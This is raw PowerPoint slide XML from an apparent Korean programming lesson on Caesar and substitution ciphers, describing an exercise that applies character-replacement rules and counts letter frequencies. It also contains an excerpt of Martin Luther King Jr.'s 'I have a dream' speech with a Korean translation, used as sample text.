              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>대문자 알파벳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>done</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다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>번으로 돌아간다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="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“done” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>으로 들어 올 시</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>“decrypted.txt” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>? &gt;&gt; </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을 출력한 후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>을 입력 받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>번과 마찬가지로</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FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>소문자 알파벳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>“done”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 외에는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>문자열 치환 룰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>업데이트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>. ( ex) A-&gt; a, A-&gt; b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>치환 시 앞의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>A-&gt; a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>는 무시된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="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3.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>A -&gt;     b    </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의 포맷으로</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>     단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>,  “-&gt;” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>자로 통일한다</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그 후에 공백은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>개이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="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이후</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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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빈도수는 대문자</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소문자</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다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>번으로 돌아간다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="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a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="541508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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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79678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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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/Theory/T4/Ceasar</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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err="1"/>
              <a:t>Marthi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>Luter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. King </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>“I have a dream”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32643496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Let us not wallow in the valley of despair. I say to you, my friends, we have the difficulties of today and tomorrow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>I still have a dream. It is a dream deeply rooted in the American dream.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>I have a dream that one day this nation will rise up and live out the true meaning of its creed. We hold these truths to be self-evident that all men are created equal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>I have a dream that one day out in the red hills of Georgia the sons of former slaves and the sons of former slaveowners will be able to sit down together at the table of brotherhood.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>I have a dream that one day even the state of Mississippi, a state sweltering with the heat of oppression, will be transformed into an oasis of freedom and justice.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>I have a dream that my four little children will one day live in a nation where they will not be judged by the color of their skin but by their character.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>I have a dream today.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:t>I have a dream today.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:t>절망의 계곡에서 뒹굴 지 말자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>친구 여러분</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>오늘과 내일의 어려움이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>아직 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>아메리칸 드림에 깊이 뿌리 박힌 꿈입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>언젠가는이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 나라가 일어 서서 그 신조의 진정한 의미를 실천하는 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>우리는 모든 사람이 평등하게 창조되었다는 자명 한 진리를 가지고 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>언젠가 조지아의 붉은 언덕에서 전 노예의 아들들과 전 노예 소유주의 아들들이 형제애의 식탁에 함께 앉을 수 있다는 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>언젠가는 억압의 열기로 무더운 미시시피 주조차도 자유와 정의의 오아시스로 변모 할 것이라는 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>내 네 명의 어린 자녀들이 피부색이 아닌 성격으로 판단되는 나라에서 언젠가 살게 될 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>오늘 꿈이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>나는 언젠가 앨라배마 주에서 악랄한 인종 차별 주의자들과 함께</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>그 주지사가 개입과 무효화라는 말로 입술이 뚝뚝 떨어지는 꿈을 꾸었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>언젠가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>알라바마에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
